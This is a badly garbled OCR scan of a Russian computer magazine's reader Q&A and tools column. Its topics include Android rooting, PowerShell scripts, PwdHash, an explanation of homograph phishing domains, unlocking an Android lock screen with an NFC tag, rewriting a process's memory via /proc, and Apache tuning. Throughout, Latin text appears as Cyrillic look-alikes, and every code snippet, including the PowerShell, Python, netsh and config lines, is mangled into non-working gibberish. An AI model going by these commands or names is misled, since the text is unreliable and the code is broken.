для ВМ тетсаспеа равным 1 Гб и запишет это 
в конфиг ВМ (флаг '--сопйод'). Количество выде- 
ленных процессоров можно изменить так: 


$ улгъИ зефусри$ араспе 2 --11\е «=! 
- -СОПЙЗ 


Правильный выбор количества ресурсов 
для каждой виртуальной машины будет зависеть 
от ситуации, однако следует иметь в виду, что это 
лишь ограничение, поэтому вполне возможно вы- 
делить, например, по 6 Гб каждой ВМ на сервере 
с 6 Гб физической памяти и положиться на под- 
систему \М, которая сама распределит ресур- 
сы между машинами. Теперь нужно мониторить 
работу виртуальных окружений и подстраивать 
ограничения для достижения баланса. 


ВЫВОДЫ 

Вот мы и получили ГАМР-сервер, в котором все 
сервисы изолированы друг от друга. Он доста- 
точно удобен в управлении, гибок в настройке 
и безопасен, можно переносить без остановки 
его сервисы на другие физические машины и до- 
бавлять сервисы, лишь немного изменяя кон- 
фигурацию. И на всю настройку ушла лишь пара 
часов. —= 


740 


ЕСТЬ ВОПРОСЫ — ПРИСЫЛАЙ 
НАЕАО@ВЕАЕ.ХАКЕРВУ 


Приобрел б/у Апагоа-смартфон. 

Не очень дружу с шитьем устройств, по- 
этому установил на него ВОМ Мападег. 
При запуске возникает сообщение, что нужен 
СосКм/огкКМо4. Но установить его не удает- 
ся — нет рута, хотя приложение $ирег$ Ц уста- 
новлено. Как такое может быть? 

Скорее всего, рут слетел после обновле- 

ния Апагоа по воздуху, и его нужно полу- 
чить заново. Лично у меня после обновления 
на Апагоа 4.3, кроме рута, вдобавок слетел 
и Весоуегу. Если в Та боч{-режиме (чаще всего 
кнопка питания + качелька громкости вниз) ты вы- 
бираешь пункт Весоуегу тосе, а в ответ получа- 
ешь Мо соттапа, значит, твой Весоуегу тоже 
слетел. Но не нужно бояться шить: шансы пре- 
вратить устройство в кирпич крайне малы. Про- 
шить Весоуегу можно с помощью Та${о0о1 (Би.[у/ 
Таэ1Воо{Ти®), после чего девайс рутуется доволь- 
но легко. 


[2] Как быстро получить отчет обо всех под- 
ключенных Ч$В-устройствах в сети? 
А Вот такой однострочный скрипт 
на РомегЗпе! выведет отчет о Ц$В- 
устройствах для локального компьютера: 


51 1п32_95ВСопго11ег)ем1се |%{ [м1 ] = 
($_.ОБерепдеп®)} | $огЕ Безсг1реЕ1оп, == 
ОРеу1сетро | +& Безсг1р1оп,Беу1сетО -аико 


Чтобы получить отчет с другого компьютера, 
ккомандлету датум добавь опцию 


-сотрифтегпате СОМРИОТЕК 


Тебе осталось лишь запустить этот скрипт 
на всех компьютерах сети и аккумулировать ре- 
зультат. 


[2] Можно ли как-нибудь установить СВУВ 
из-под винды? 

А Единственное решение, известное мне 

сейчас, — использование приложения 
ЕазуВСО (пеозтам.пе{/а!.рир?=1), которое, 
кроме всего прочего, умеет устанавливать осно- 
ванный на СРУВ бутлоадер под названием 
МеоСгиЬ (Би.1у/БЕСМ/ЗР). Не полноценный САОВ, 
конечно, но достаточно хорошее решение. Фай- 
лы конфигурации ты можешь легко редактиро- 
вать из-под винды; также поддерживается МТЕЗ. 


Пароли к моим аккаунтам зависят от до- 

менного имени сайта (некий паттерн). 
Понимаю, что это небезопасно, но никак 
не могу перейти на парольные менеджеры — 
КееРа$$ лично мне неудобен, а Ёа${Ра$$?у 
яне доверяю. Какие еще есть варианты? 

Существует удобнейшее решение твоей 

проблемы, давным-давно придуманное 
профессорами из Стэнфорда. С ним тебе прак- 
тически не придется менять свои привычки. 
РиаНазйН (м/и. рммапазй.сот) — это небольшой 
скрипт, доступный также в виде расширений 
для браузеров (ссылки на расширения Спготе, 
Орега и ЕгеТох ты найдешь на странице проекта), 
из доменного имени сайта и твоего пароля 
для этого сайта он генерирует хеш, который по- 
том и используется в качестве пароля. Вся пре- 
лесть в удобстве: просто начинай вводить свой 
пароль, начиная с @@, или перед вводом пароля 
нажми <Е2>, и поле моментально «пожелтеет» 
(смотри скриншот). Теперь можешь спокойно 
вводить свой пароль — на сайт вместо пароля 
улетит хеш. 

Поскольку хеш построен на базе псевдоран- 
домной функции (РВЕР), то за разумное время 
он необратим. Ну и конечно, вычисление хеша 
производится локально. 
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У 


Роман Гоций 
0015$тотап@дтан.сот 


Вход Регистрация 


Имя пользователя или етай: 


{е5Цез 


Пароль: 


РмАНа$И в действии 


Пришло письмо (явно мошенническое), 

в котором была ссылка на рйуа®Фапк.иа. 
После нажатия на эту ссылку она чудесным 
образом превратилась в хп--ри\Бапк-Зуп. 
ца. Как это работает? 

Судя по всему, ты стал жертвой так называ- 

емой Нотодурй (омоглиф) атаки. В чем же 
ее суть? Согласно вики, омоглифы — это графи- 
чески одинаковые или похожие друг на друга зна- 
ки, имеющие разное значение. Думаю, тебе из- 
вестно, что сейчас есть возможность именовать 
домены с помощью Упюоде-символов (ЮМ — 
итегпайопа!хеа аотат пате). Примером могут 
служить кириллические домены. Так вот, пробле- 
ма втом, что среди символов Упсоае много омо- 
глифов: самый банальный пример — это латин- 
ская буква р и кириллическая р. Для обратной 
совместимости был разработан стандартизиро- 
ванный метод преобразования последовательно- 
стей Утсоде-символов в так называемые АСЕ- 
последовательности (Рипусоае), которые состоят 
только из алфавитно-цифровых символов, как это 
разрешено в доменных именах. В целях безопас- 
ности современные браузеры отображают неко- 
торые Уптсоае-ссылки сразу в Рипусоае — при- 
мер этого как раз и есть то «волшебное» 
превращение риуабапк.цна в хп--ри\бапк-Зуйп.ца 


РАЗЬЛОКИРУЕМ АМОВОО ТЕЛЕФОН ИЛИ ПЛАНШЕТ С ПОМОЩЬЮ МЕС-МЕТКИ 


Сегодня многие из выпускаемых 
устройств имеют поддержку техноло- 
гии МЕС. Но к сожалению, в российских 
условиях МЕС-модули относительно 
редко находят себе применение, даже 
больше: у пользователя из глубинки 
такой модуль, скорее всего, не исполь- 
зуется вообще. Давай же нагрузим его 
работой. Для этого возьмем на воору- 
жение пассивные МЕС-метки и научим 
их, например, разблокировать наш 
смартфон или планшет. 


Что нам нужно 

Прежде чем начинать какие-либо 
действия, нужно убедиться, что в твоем 
устройстве есть МЕС-модуль :). Еще одно усло- 
вие успеха — наличие рута. Теперь определимся 
со списком софта, который нам необходим. 

Вся наша схема будет держаться на трех китах, 
доступных официально в Сооде Рау. Первым 

из них будет небезызвестный ТазКег (БИ.1у/ 
{азкег арр). Кроме того, нам потребуется Зесиге 
Зейто$ (БИ.1у/зес$е1). Последним приложением, 
которым мы воспользуемся, станет МЕС Тазк 
[аипсрег (6 И.1у/птсТазк(.). Также нужна доступная 
на запись МЕС-метка. 


Включаем МЕС оп осК$сгееп 

По умолчанию МЕС-модуль «отклю- 

чен», если устройство залочено, и нам 
нужно это изменить. Самый простой метод (на 
некоторых прошивках или устройствах не рабо- 
тает) — использование твикера Хрозеа (6и.1у/ 
хРозеад) и модуля для него МоВаСо ТооКИ (БИ.[у/ 
МораСо-{юо!). Первым делом установи и запусти 
Хрозес, затем нажимай на кнопку инсталляции. 
Перезагрузи устройство, устанавливай МоПаСо 
ТооКК, запускай, иди в пункт меню \\Иге!е$$ 
и ставь галочку напротив Епа е МЕС мпеп 
эсгееп 1$ оН. Опять запускай Хрозеач и на вкладке 
Моаце$ активируй МоВаСо ТооКИ. 


РАО 
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(кстати, если бы ты использовал Ргетох, мог бы 
так и не узнать, что попал на сайт к мошенникам: 
он отобразил бы ссылку в первоначальном виде). 
Больше информации об атаке читай здесь: О И.Иу/ 


ПО!АНаск. А здесь: БИу/птариСеп лежит удоб- 
ный генератор подобных ссылок. 


В линуксе при помощи Ру{Поп пробую 

через /ргос/<ргос_14>/тет перезапи- 
сать участок памяти запущенного мной же 
процесса. Но не могу даже прочитать его — 
нарываюсь на ошибку. В чем причина? 

Дело в том, что не вся память процесса до- 

ступна для чтения и/или записи. Информа- 
ция об участках памяти процесса хранится 
в /ргос/<ргос_14>/тар$. Каждая строчка файла 
начинается примерно так: 


959+6000-95с18000 гм-р_... 


где первые две цифры — начало и конец участка, 
а буквы, следующие за ними, как несложно дога- 
даться, — права доступа к этому участку. Учиты- 
вая вышесказанное, замена строки в памяти про- 
цесса будет выглядеть примерно так: 


р1Ч = 'ргосез$1а" 
и1ЕП ореп(' /ргос/{}/тар$'.Фогта* (рта), = 
г’) а$ мар$_Я1е, 
ореп( '/ргос/{}/тет' .Рогта*(р1а),'г+Ь', = 
БиРег1п2=Ра15е) аз тет: 
Фог 11пе 1п мар$_Я1е: 
и=ге.тмафсИи(г'^(9-9А-Ра-+ (+)-(9-«: 


# Если область не геаа/мг1е,_ 
# то пропускаем ее 
ТГ ПОЕМ: 
сопЕтпие — | _ 
таг, еп = (11% (5, 16) Ког в + 
1п м.#гочрз ()) 
к 
мет. зеекК ($фаг®) ОНИ 
_ сПипК = мет_Я1е.геад (епа-$Фаг{) _ 
ехсере (ОмегЯомЕггог, ТОЕггог): 
сопетпие 
1 = спипк. па (Ь"зотефех{") 
[& 
1 


`е5+=СИийК. 
Е 11=-1: 


| реп ('гемг1еп аЕ {}'. += 
_ __ Фогма*($%аг®)); 


Как запросить из Ромег$Пе!-скрипта 
права админа? Добавление опции 


Настраиваем $есиге Зе та$ 
Отключать защиту локскрина (пароль, 
жест и прочее) будем с помощью 
приложения Зесиге Зейто$, которое хорошо 
интегрировано с ТазКег (вообще говоря, Тазкег 
поддерживает эту возможность нативно, но ино- 
гда она работает некорректно). Проделаем 
некоторые настройки. Для начала запускай при- 
ложение, нажимай на РгЕТегепсе$з, где выставь 
галочку напротив пункта Оемсе Аатитаюг. 
Теперь включим интеграцию с ТазКег. Для это- 
го на главном экране приложения переходи 

на вкладку Нерег и нажимай на кнопку с надпи- 
сью СИск то ш$аи. 


Полезный хинт 
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КАК УМЕРИТЬ АППЕТИТ ИНДЕЙЦА 


Поднял дома АрасВе, на котором 
хостится несколько проектов. Ко- 
личество посетителей очень мало, 
но апач все равно отнимает много систем- 
ных ресурсов. Счего начать оптимизацию? 
Первое, о чем нужно подумать пе- 
ред тем, как начинать оптимизацию 
Араспе, — нужен ли тебе Араспе. 
Для домашнего сервера вполне может хва- 
тить функциональности более легковес- 
ных веб-серверов, как, например, Папйра 
(папира.пе?), 1 ра (Биу/Леш\оОВ), пт! Пра 
(БИ.У/ЛЗп Нм.) или даже сверхлегкого птсго 


ПЁра (61.1у/14р1727). Если же без индейца 


совсем никак, то начать следует с тотального 
отключения всех неиспользуемых модулей, 
что сохранит оперативную память, атакже по- 
высит производительность. Дальше следует 
посмотреть на конфигурацию параллельной 
обработки запросов, так как конфигурация 
по умолчанию не оптимальна для слабо нагру- 
женного домашнего сервера: в памяти посто- 
янно висит пять процессов Араспе, хотя в тво- 
их условиях может быть достаточно и одного. 
Вот пример минимальной конфигурации: 


эгарсъермеге 1 
М1ипбраге$егуег$ 1 


/хаг/мми/сопЕ/БЕЕра.сопЕ [+] [ВО] 
-- ТМЗЕВТ -- 


Настраиваем Та$Кег 
Для начала зайди в настройки Тазкег 
и на вкладке Мс включи опцию АПо\\ 


Ежегпа! Ассе$$, чтобы можно было выполнять 
таски Тазкег’а из стороннего приложения (МЕС 
Тазк [аипспег), ана вкладке Ш отключи Ведтпег 
тоае. Описание настройки профилей и тасков 
займет много журнального места, поэтому я под- 
готовил для тебя файл проекта (6И.1удазкегМЕС). 
Скачай и импортируй его (нажми на иконку 

с домиком в левом нижнем углу, затем ипро\). 
Думаю, ты разберешься — там всего два про- 
филя и два таска. Скажу лишь, что таск Тад Веаа 
как раз и выполняется из МЕС Тазк Гаипсйег. 


Мах5$раге$егуег$ 1 
МахС11еп $ 10 


Еще одно значение, которое стоит изменить 
в конфиге, — это КеерА!меТитеощ, по умолча- 
нию оно равно 15 с, хотя чаще всего достаточ- 
но 3—4 с. 

Очень много времени Араспе тратит 
на обработку файла .Пфассе$$: для каждого 
запроса .Пфассе$$ загружается и обрабаты- 
вается заново, при этом загружаются и об- 
рабатываются файлы .И*ассе$$ для всех ро- 
дительских каталогов верхнего уровня, вплоть 
до ПОоситещрВосот. Даже если .„Пфассе$$ 
в каком-то из каталогов не обнаружен, Араспе 
все равно будет искать конфиги при каждом 
запросе, поскольку они могут появиться в лю- 
бой момент. Поэтому подумай, нужны ли тебе 
.ИЖассе$$, нельзя ли обойтись только основ- 
ным файлом конфигурации? 

Если можно — смело отключай обработку 
директивой 


А11омО\егг1ае М№пе 


Кстати, можешь попробовать поиграть с раз- 
ными моделями мультипроцессинга (МРМ) — 


подробнее здесь: БЙ.1у/араспемРМ. 


Правим 
конфиг 
Араспе 


Настраиваем МЕС Так Гаипсвег 

Запускай МЕС Так Гаипспег и созда- 

вай новый таск. В качестве триггера 
выбирай МЕС. Дальше нажимай на + иищи 
в появившемся меню пункт Тазкег -> Тазкег 
Тазк, выбирай нужный — в нашем случае это 
Тад Веаа. Нажимай на $ауе апа мм Ще (стрелка 
вверху справа — смотри скрин), после чего 
откроется окно записи МЕС-метки. Поднеси 
метку к устройству для записи. После успешной 
записи нажимай на галочку (появится вместо 
стрелки). На этом настройка завершена: чтобы 
снять устройство с блокировки, просто поднеси 
к нему метку. 
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к 
‹ || МЕС ТазК Гаипсвег = > 


ТАЗК 1 ТА$К 2 


Мате: МЕС Упоск 


Гаипсй Тад Веад 10 Буез 


Переходим к записи данныхна МЕС-метку 


-ВипАзАдтитгатог в #гедиге$ просто не дает 
скрипту выполниться без прав админа, ануж- 
но именно запросить. 
Самым простым решением будет запуск 
нового окна Ромег5пе!й, но уже с правами 
админа и запуск в нем того же скрипта с теми же 
параметрами. Сделать это можно, например, так: 


$изег = М№ем-ОБЗесЕ $есиг1%у.Рг1пс1ра1 .- 
И1иаом$Рг1пс1ра1 $($есиг1%у.Рг1пс1ра1 . == 
И1падом$ТаепЕ1%у (::бееСиггеп* ()) 
1+ (-пое $изег.ТзТиВо1е( $есиг1\у. «= 
Рг1пс1ра1 .и\1п9ом$Ви11{1пКо1е ‹= 
(: :Адт1п15Егафог)) { 
# Перезапускаем с правами админа 
5фаг&-Ргосез$$ ромег$Пе11.ехе -\егб += 
ВипА$ -АгритептЕ1$Е ("-поргой1е ‹= 
-поех1* -В1е "{0}"'-+ += 
($Р5СоттапаРа*Н)) 
ех1{ } 


Если скрипт должен работать на версии 
Ро\мег5Не! ниже 3.0, замени $РЭСоттапаРа{йЙ 
на $МупиосаНоп.МуСоттапа.Оейп оп. 


С помощью Сгоп настроил на рабочем 
ноуте еженедельный бэкап в облако. 
Но если лаптоп был выключен в момент, когда 


ТО ]5СЕРТ ОВ МОТ ТО 5СВРТ? 


Сепега! | ЗНойси: Зесийу ] Оейайз | ь 


9 реоре 


Тагде! 1уре: Аррйсавоп 
| Тагде юосайоп: МАпдомз 


Тагаей: 


Займ: СА\МИпдомз\зуфет32 


| ЗНойси Кеу: |М№пе 


Е ани 


Соттег: 


Ореп Не Шосавоп ' | Спапде соп... 


Ярлыкна Мено-приложения Реоре 


должен был произойти бэкап, то после вклю- 
чения он не выполнится. Как быть? 

Помимо Сгоп, на твоем ноуте также досту- 

пен менее известный в широких кругах 
Апасгоп, который как раз и обладает нужным тебе 
функционалом. Конфигурация Апасгоп лежит 
в файле /е*с/апасгоп%аЬ. Формат этого файла от- 
личается от формата файла конфигурации Стоп. 
Каждая задача определяется следующей строкой: 


соттапа 


рег1оа ае1ау 3об-14епе1йег 


где репо4 задается в днях (можно также указать @ 
поп, чтобы выполнять задачу раз в месяц, не- 
зависимо от количества дней в месяце), аеау — 
задержка в минутах после запуска системы перед 
выполнением задания. Остальные параметры 
должны быть понятны без пояснений. 


Часто для одноразовых регистраций 

пользуюсь сервисами, которые предо- 
ставляют временный етай-адрес. Раньше си- 
дел на Епетох и юзал для этого расширение 
Вюоау МКтоа$, теперь пересел на СВготе — 
какую замену порекомендуешь? 

Из всех сервисов для меня удобнее всего 

УОРтай (5 и.1у/УОРтай). Кроме того, есть 
ТгазпМай! (6(.у/ТгазпМа!) и МаЙпаюг (Биу/ 
таШпа{о/). 


Недолюбливаю уауа$спйр+, поэтому интересует такой момент: можно 
ли создать расширения для СПготе на другом языке? 


Увы, но при разработке рас- 
ширения для Сбоое Спготе без 
ЧамаЗсирт обойтись невозможно. 
Так или иначе, но ЧамаЗ спирт будет 
замешан все равно. Если восполь- 
зоваться Сооде Мер Тоо!КИ (\м/м/м. 

мАрго]ест.ога/омегуе\ми. т), то 
можно разработать приложение на 
Чама, но скомпилируется оно все 
равно в Чамазсиру. 


Можно посмотреть в сторо- 

ну СИготе Майе Сйет (6 и.1у/ 
дооЧептс) — опенсорсной техноло- 
гии от бооде, позволяющей запу- 
скать нативный скомпилированный 
код прямо в браузере, практически 
без потерь производительности. 
Используя данную технологию, 
можно написать бэкенд-расшире- 
ния на С/С++ (но для фронтенда 
все равно нужен уама$сиру. 
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Мел/Витар 
таде 


Я бы рекомендовал установить два (или три) 
на случай, если один из них фильтруется при ре- 
гистрации. 


Возможно ли создать ярлык на Маего- 

приложение? Хочу добавить одно из них 
в автозагрузку. 

Для доступа к Мего-приложениям из дес- 

ктоп-окружения можно воспользоваться 
«ОАВЁом приложения». Например, приложение 
Реор!е доступно по УВЕ ммреоре://, а Саепадаг — 
по мМсаепааг://. Возникает логичный вопрос: 
как узнать УВЕ любого другого приложения? 
Из реестра. Для этого обратись к ветке 


НКСУ\$оРЕмаге\С1а$ зе \Ехеп$1о0п$ 


Почти в самом низу раздела найди директорию 
нужного приложения и посмотри на значение 
по умолчанию в ней — там и должен лежать иско- 
мый ЦВЕ. Если же директории приложения в Ех- 
{епз!оп$ не оказалось, то попробуй поискать ее в 


Ех еп$1оп$ \СопЕгас1а\и1паом$ .Ргофосо1\+ = 
РасКазе1а 


Найдя нужную, погружайся вглубь по подди- 
ректориям, пока не доберешься до раздела 
СизотРгоре!е$. Значение строкового пара- 
метра Мате в нем и будет УВАГом. После того 
как УВЕ есть, запустить приложение можно так: 


ехр]1огег.ехе "УВЕ: //" 


что и нужно прописать в ярлык (смотри скрин). 
Кроме того, можно запускать Мего-приложения 
при помощи РомегзПе! — ои.1у/МетоЕготР5. 


Почему компьютер с \ММп4о\м$ 8 на борту 

не отвечает на ртд-запросы? 

В целях безопасности (хотя лично я не вижу 

в этом особого смысла) Мсгозой еще 
со времен \МЗа отключила в конфигурации 
по умолчанию ответы на ртд-запросы. 

Сделано это на уровне брандмауэра. Вклю- 

чить можно из командной строки: 


пее$И Агема11 зе 1стрзеЕ1пв 8 


или же в оснастке «Брандмауэр \/тао\м$ в режи- 
ме повышенной безопасности» (\МИпао\м$ Еиемиай 
МИ аауапсеа зесигцу). = 
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ЧУЗТОЕТЕТЕ МЕ (|510е|ве.те) 


—> Многие из нас обожают пробовать сервисы. Каждый 
новый сервис — это новая учетка и новый уголок интерне- 
та, в котором о тебе знают всё. Проходит время, и ты за- 
бываешь и о сервисе, и о том, что там есть твои данные. 
Надеюсь, ты приучил себя регулярно проверять, что «под- 
сасывается» к твоим учеткам в Соод!е, Огорбох, Еасебоок 
и Тег. Ну а для того, чтобы упростить регулярную чистку, 
пригодится уи$1 Веще Ме — список ссылок на страницы 
удаления из различных сервисов. На момент написания за- 
метки в каталоге содержалось около 250 сервисов, причем 
для каждого указана простота удаления данных. Например, 
чтобы удалиться из Еееду, нужно обратиться в техсаппорт. 
Заставляет задуматься, не так ли? 
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НТТР МО\М/НЕВЕ (177|.|2/1463272) 


—> Многим знакомо расширение НТТР$ Е\уегумпеге 

от Еецгопс ЕгопЯег Гоипаайоп, принудительно включающее 
НТТР$-канал везде, где он есть, но не включен по умолча- 
нию. Разработчики НТТР Момпеге, бесплатного расширения 
для Нгетох, как нетрудно догадаться, пошли еще дальше — 
пользователю предлагают не только активировать НТТР$ где 
только можно, но еще и полностью блокировать незащищен- 
ный НТТР-трафик. Так пользователь может обезопаситься 
от ситуаций, когда такие подключения генерируются даже 
на защищенных сайтах, например из-за сторонних виджетов, 
межсайтовых запросов и так далее. У пользователя есть воз- 
можность добавлять конкретные сайты в белые списки. 
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МСРОК (погок.сот) 


—> И снова вернемся к прошлому выпуску \ММЛ//2. Тогда речь 
шла о сервисе юсаКиппе|, с помощью которого можно быстро 
открыть «в мир» локальный веб-сервер. Это позволяет 

без лишних настроек продемонстрировать рабочий код, 
сетевое приложение любого типа. Или даже расшарить файл, 
не дожидаясь заливки в облако или файл-хостинг. Магок — 
это более функциональное и стабильное решение той же 
проблемы. С его помощью можно поднимать НТТР$-каналы, 
создавать запароленные туннели. Кроме того, утилита ведет 
подробные логи о подключениях, так что весь входящий 
трафик потом можно будет проанализировать. С помощью 


функции гер!ау можно изучить любой отдельно взятый запрос. 


ЕХРЕАМ ЗНЕЦ. (схоатзве!.сот) 


—> В прошлый М/ЛММ/2 вошел сервис Ведех101, разбиравший 
на кусочки и объяснявший регулярные выражения. Ехр!ат 
Эпе! — это то же самое, только для ЧМ!Х-команд. В общем, 
это для тех, кому тап’ы кажутся слишком многословны- 

ми. Вбиваешь полную команду, а сервис выделяет все ее 
параметры и пытается их документировать. По сути, Ехр!атп 
пе! просто определяет все основные смысловые единицы 
в синтаксисе запроса и соотносит их с описаниями из до- 
кументации. Получается очень наглядно и быстрее, чем ковы- 
ряние в тап. В следующих версиях автор обещает добавить 
поддержку рре’ов и других сложных конструкций. В качестве 
первоисточника взяты тап-страницы из поставки Убит. 
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